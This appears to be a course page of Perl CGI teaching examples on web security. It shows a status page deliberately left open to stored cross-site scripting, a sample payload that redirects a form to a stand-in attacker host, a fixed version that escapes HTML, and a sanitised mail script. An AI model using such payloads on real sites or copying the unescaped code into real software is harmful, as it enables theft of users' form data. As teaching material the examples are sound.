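sub change_mark_screen {
    # pass the login and password on as hidden fields so they can be authenticated again
    my $login = escapeHTML(param('login'));
    my $password = escapeHTML(param('password'));
    print <<eof
<form action="">
Enter 2041 student number: <input type="textfield" name="student_number">
<br>
Enter new mark: <input type="textfield" name="new_mark">
<br>
<input type="submit" value="Change mark">
<input type="hidden" name="login" value="$login">
<input type="hidden" name="password" value="$password">
</form>
</body>
</html>  
eof
}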

sub mark_changed_screen {
    my $student_number = param('student_number');
    my $new_mark = param('new_mark');
    print  "Mark for $student_number set to $new_mark\n<p>\n";
    change_mark_screen();
}


to exhibit a cross site scripting attack

The code below allows a user to upload a string describing their status. This string is then included in a web page viewed by other users, which is a security hole because it allows a cross-site scripting attack.

A user can upload HTML, which will then be embedded in a web page viewed by other users.

They can, for example, upload JavaScript which changes the page, such as redirecting where a form is submitted.

For example, they could upload this JavaScript: <script>window.onload = function () {document.getElementsByTagName("form")[0].action = "http://hackers.r.us/hack.cgi";};</script>

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /^$user:(.*)$/;
    }
    close P;
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;


to exhibit avoiding a cross site scripting attack

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('My Status'), h2('Status Summary');
warningsToBrowser(1);

$data_directory = "./status_data/";
-d $data_directory or mkdir $data_directory or die "Cannot create $data_directory: $!\n";

if (param('new_status')) {
    my $user = param('user');
    
    # sanitize supplied user name
    $user =~ s/\W//g;
    $user = substr($user, 0, 128);
    
    # retrieve correct password from file "status_passwords"
    my $correct_password;
    open P, '<', "status_passwords" or die;
    while (<P>) {
        last if ($correct_password) = /^$user:(.*)$/;
    }
    close P;
    
    # if supplied password is correct update users's status 
    
    if (defined $correct_password && $correct_password eq param('password')) {
        open S, '>', "$data_directory/$user" or die;
        print S param('new_status');
        close S;
        print "Status for $user updated\n",p;
    } else {
        print "Error: could not update status for $user\n",p;
    }
}



# display the status of all users
foreach $status_file (glob "$data_directory/*") {
    my ($user) = $status_file =~ /\/([^\/]*)$/;
    open F, '<', $status_file or next;
    my $user_status = join '', <F>;
    
    # prevent an XSS attack by stopping HTML tags being included
    # & must be escaped first, otherwise the & in &lt; and &gt; would be escaped again
    # this is not sufficient in other contexts
    # https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
    $user_status =~ s/&/&amp;/g;
    $user_status =~ s/</&lt;/g;
    $user_status =~ s/>/&gt;/g;
    print "<li> $user: $user_status\n";
}

# allow users to update their status

print   hr,
        start_form,
        p, 'Username: ', textfield('user'), 
        p, 'Password: ', textfield('password'),
        p, 'New status: ', textfield('new_status'),
        p, submit('Update status'),
        end_form,
        end_html;
exit 0;
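
One way to escape a status string before embedding it in HTML can be sketched as below. The function name escape_html is a hypothetical helper. Escaping both kinds of quote as well is an assumption made so the result could also be used inside an attribute value.

```perl
use strict;
use warnings;

# hypothetical helper: replace characters that are special in HTML
sub escape_html {
    my ($text) = @_;
    $text =~ s/&/&amp;/g;    # must come first, or the & added below would be escaped again
    $text =~ s/</&lt;/g;
    $text =~ s/>/&gt;/g;
    $text =~ s/"/&quot;/g;
    $text =~ s/'/&#39;/g;
    return $text;
}

print escape_html('<script>alert("x & y")</script>'), "\n";
```

CGI.pm also provides escapeHTML, which one of the example scripts on this page already uses, so a hand-written function like this is only needed where CGI.pm is not loaded.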


with CGI security hole fixed

use CGI qw/:all/;
use CGI::Carp qw(fatalsToBrowser warningsToBrowser);

print header, start_html('A Simple Example');
warningsToBrowser(1);

$address = param("address");
if (!defined $address) {
	print start_form, 'Enter e-mail address: ', textfield('address'), end_form, end_html;
	exit 0;
}

# Remove all but characters legal in e-mail addresses
# and reduce to maximum allowed length
$address = substr($address, 0, 256);
$address =~ s/[^\w\.\@\-\!\#\$\%\&\'\*\+\-\/\=\?\^_\`\{\|\}\~]//g;

open F, '|-', 'mutt', '-e', 'set copy=no', '-s', 'web message', '--', $address or die "Can not run mail";
print F "Hello\n";
close F;
print "Mail sent to $address\n", end_html;

COMP[29]041 Example CGI scripts

Git: lecture slides, lecture notes

Exam: lecture slides, lecture notes



COMP[29]041 All Links


All Tutorial Questions: 02 03 04 05 06 07 08 09 10 11 12 13
All Tutorial Sample Answers: 02 03 04 05 06 07 08 09 10 11 12 13
All Laboratory Exercises: 02 03 04 05 06 07 08 09 10 11 12 13
All Laboratory Sample Solutions: 02 03 04 05 06 07 08 09 10 11 13
All Weekly Test Questions: 05 06 07 08 09 10 11 13
All Weekly Test Sample Solutions: 05 06 07 08 09 10 11 13
Intro slides notes     Stack Overflow - Q&A for programmers
Filters slides notes Command Line Examples     regex1011: online regex tester
Shell slides notes     Shell commands for power users.
Perl Intro slides notes     perl.org documentation, FAQs & tutorialsa quick referencecourse lecture notesCSE CPAN mirror
Perl Arrays slides notes
Perl Regex slides notes     regex summary
Perl Functions slides notes
Python slides notes     Evan's: Python slidesAdvanced Python slidesPort Forwarding TutorialFlask Tutorial Video     python.org tutorialPerl-->PythonrecipesCrash into PythonGoogle tutorialQuick Guide The hard way
Web slides notes
CGI slides notes Cgi Examples    
CGI.pm tutorial
Git slides notes
Exam slides notes